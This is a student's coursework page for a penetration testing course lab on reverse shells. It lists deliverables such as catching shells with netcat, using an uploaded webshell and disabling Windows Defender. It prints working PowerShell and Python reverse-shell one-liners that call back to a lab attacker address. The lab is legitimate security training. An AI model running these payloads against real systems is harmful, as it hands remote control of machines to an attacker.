SEC-335: Eth. Hacking & Pen. Testing
HomeTech JournalsPersonal ProjectsSysadmin Wiki
  • SEC-335: Eth. Hacking & Pen. Testing
  • Breakdown
    • Course Overview
  • Activities/Assignments
    • Assignment 1.2: The Kali Virtual Machine
    • Activity 2.1: Host Discovery
    • Activity 3.1: DNS Enumeration
    • Activity 4.1: Exploiting Cupcake
    • Assignment 5.1: Breaking into Kali
  • Labs
    • Lab 2.1: Port Scanning 1
    • Lab 2.2: Port Scanning 2
    • Lab 3.1: Powershell and DNS
    • Lab 3.2: DNS uses TCP and UDP
    • Lab 5.1: Password Guessing
    • Lab 6.1: Cracking Linux Passwords with JtR and Hashcat
    • Lab 7.1: Exploiting pippin.shire.org (10.0.5.25)
    • Lab 8.1: Weevely
    • Lab 8.2: Reverse Shell
    • Lab 9.1: Exploit Gloin
    • Lab 10.1: Linux - Permission Vulnerabilities
    • Lab 10.2: Exploiting nancurunir
    • Lab 11.1: Metasploit
    • Final: Bree
  • Tools/Recon
    • Metasploit
    • NMAP
    • Active/Passive Reconnaissance
    • Shodan
    • The Harvester
    • Netcraft
    • Metagoofil
    • DNS-Enumeration
    • CEWL
    • rsmangler
    • Hydra
    • DIRB
    • John the Ripper
    • Hashcat
    • Passwords
    • TMP
Powered by GitBook
On this page
  • Deliverable 1. Run wireshark, create a capture filter on 4449/tcp and capture a command or two entered through the nc session. Provide a screenshot showing the followed tcp stream, similar to the screenshot below.
  • Deliverable 2. Try this out on Pippen by leveraging an uploaded webshell or reverse shell on pippen to run a similar command to connect back to a listener. You may need to upload a small shell script to make this happen, particularly if you are using the simple-backdoor.php script. Provide a screenshot similar to the one below that shows you invoking the reverse shell on the target via curl or your web browser and catching the connection on your kali box.
  • Deliverable 3. Access your windows system on SEC335-WAN via remmina (so that you can copy paste). Provide a screenshot similar to the one below that shows the unsuccessful execution of powershell via cmd.exe followed by the successful reverse shell after you figure out how to turn off Windows Defender.
  • Deliverable 4. Hit the internet, see if you can create a python2,3 or php reverse shell on any of the linux targets. Provide a screenshot similar to the one below as well as the full text of the command used and the results of the id command invoked on the rocky through the reverse shell.
  1. Labs

Lab 8.2: Reverse Shell

PreviousLab 8.1: WeevelyNextLab 9.1: Exploit Gloin

Last updated 2 years ago

Deliverable 1. Run wireshark, create a capture filter on 4449/tcp and capture a command or two entered through the nc session. Provide a screenshot showing the followed tcp stream, similar to the screenshot below.

Deliverable 2. Try this out on Pippen by leveraging an uploaded webshell or reverse shell on pippen to run a similar command to connect back to a listener. You may need to upload a small shell script to make this happen, particularly if you are using the simple-backdoor.php script. Provide a screenshot similar to the one below that shows you invoking the reverse shell on the target via curl or your web browser and catching the connection on your kali box.

Deliverable 3. Access your windows system on SEC335-WAN via remmina (so that you can copy paste). Provide a screenshot similar to the one below that shows the unsuccessful execution of powershell via cmd.exe followed by the successful reverse shell after you figure out how to turn off Windows Defender.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.22',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Deliverable 4. Hit the internet, see if you can create a python2,3 or php reverse shell on any of the linux targets. Provide a screenshot similar to the one below as well as the full text of the command used and the results of the id command invoked on the rocky through the reverse shell.

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.22",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Source:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell